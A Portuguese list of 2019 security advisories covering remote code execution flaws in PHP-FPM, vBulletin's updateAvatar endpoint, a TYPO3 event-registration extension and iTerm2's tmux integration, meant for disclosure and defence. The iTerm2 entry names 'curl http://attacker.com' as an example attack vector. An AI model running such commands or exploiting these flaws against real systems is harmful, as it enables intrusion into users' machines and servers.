ASA-2019-00595 – PHP: underflow em env_path_info em fpm_main.c pode conduzir a Execução de Código Remota

No PHP em certas configurações do FPM, é possível fazer com que o módulo FPM escreva dados além dos limites do buffer alocado no espaço reservado para o protocolo FCGI, permitindo assim  execução de código remota.

ASA-2019-00588 – vBulletin: Execução remota de código no endpoint updateAvatar

Um input do usuário transmitido pelos parâmetros "data[extension]" e "data[filedata]" para o terminal "ajax/api/user/updateAvatar" não é validado adequadamente antes de ser usada para atualizar o avatar do usuários. Isso pode ser explorado para injetar e executar código PHP arbitrário. A exploração bem-sucedida dessa vulnerabilidade requer que a opção "Save Avatars as Files" esteja ativada (desativada por padrão).

ASA-2019-00583 – Extensão TYPO3 SLUB: Event Registration (slub_events): Múltiplas vulnerabilidades

A extensão permite fazer upload de arquivos arbitrários para o webserver. Para as versões 1.2.2 e anteriores, esta vulnerabilidade resulta em execução remota de código. Nas versões posteriores à 1.2.2, a vulnerabilidade pode resultar em negação de serviço, pois o servidor pode ser preenchido com arquivos arbitrários. A extensão também inclui o jQuery 2.2.4, que é conhecido por ser vulnerável a Cross Site Scripting.

ASA-2019-00556 – iTerm2: Execução remota de comando através de output para o terminal

Uma vulnerabilidade crítica foi identificada no recurso de integração tmux do iTerm2. Um atacante capaz de produzir output para o terminal pode, em muitos casos, executar comandos no computador do usuário. Exemplos de vetores de ataque para isso seriam a conexão com um servidor SSH controlado por um atacante ou comandos como curl http://attacker.com e tail -f /var/log/apache2/referer_log.